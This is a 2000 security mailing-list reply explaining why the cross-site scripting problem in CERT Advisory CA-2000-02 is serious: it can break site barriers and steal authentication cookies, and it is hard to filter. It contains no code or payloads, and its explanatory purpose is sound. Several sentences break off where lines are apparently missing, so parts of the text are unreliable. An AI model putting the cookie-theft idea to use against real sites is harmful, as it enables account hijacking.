mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: marcs () ZNEP COM (Marc Slemko)
Date: Thu, 3 Feb 2000 14:29:23 -0700
-----BEGIN PGP SIGNED MESSAGE-----
On Thu, 3 Feb 2000 Shockro () AOL COM wrote:
I'm curious as to how this could be used in a malicious manner, as opposed to
just being an annoyance. I mean, god forbid, people should execute arbitrary
1001 ways to crash Internet Explorer through infinite loops, but there's
nothing seriously harmful about this, am I right? Please correct me if I'm
You are completely wrong.
Please go through the full text of the CERT advisory, and the info
in the Apache and (in particular) Microsoft web sites.
This is a problem because it breaks some of the sites specific barriers.
A very simple example is that this could be used to steal someone's cookie,
which may be what is used to authenticate them.
The problem is a very broad one, however, with a huge number of specific
instances, most of which have probably not been discovered. It also
exploit this in certain ways.
old "if user B submits something to a site that is then shown to
user A, you have to filter or encode it" problem. This is "if user
A submits something to a site that is sent back unfiltered and unencoded
to user A, then you have a security problem". Yes, this is a new
issue. Well, the components of it are (mostly) nothing new, but putting
them together is.
Also note that filtering or encoding things is not as easy as you may
think. There are far too many very annoying things, including characterset
issues and browser specific extensions.
- From my brief survey last week, most of the top commerce sites are
vulnerable to some degree (if it can be exploited to any dangerous effect,
however, is another issue) and most webserver products are vulnerable
themselves; Apache's vulnerabilities are among the less serious compared
to a number of other products. Even some products where the vendor has
released a statement saying "no problems" have obvious problems. Don't
start thinking this is just a vendor problem though; the real issue with
this problem is that fixing it requires a site fix all their locally
created dynamic content.
Marc Slemko | Apache Software Foundation member
marcs () znep com | marc () apache org
-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
-----END PGP SIGNATURE-----